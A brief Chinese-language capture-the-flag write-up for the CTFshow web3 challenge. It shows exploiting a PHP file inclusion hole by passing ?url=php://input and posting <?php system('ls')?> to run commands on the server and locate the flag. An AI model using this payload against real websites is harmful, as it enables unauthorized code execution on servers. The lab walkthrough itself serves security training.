CTFshow-web-web3 打开靶场,显示如下 使用Burp Suite进行抓包,利用php://input伪协议执行PHP代码 ?url=php://input – GET请求的url中拼接伪协议 <?php system('ls')?> -- post请求内容构造需要执行的代码 ![在这里插入图片 点击放包,回到页面,显示如下 我们在url地址栏中拼接url参数,访问ctf_go_go_go,显示如下 找出flag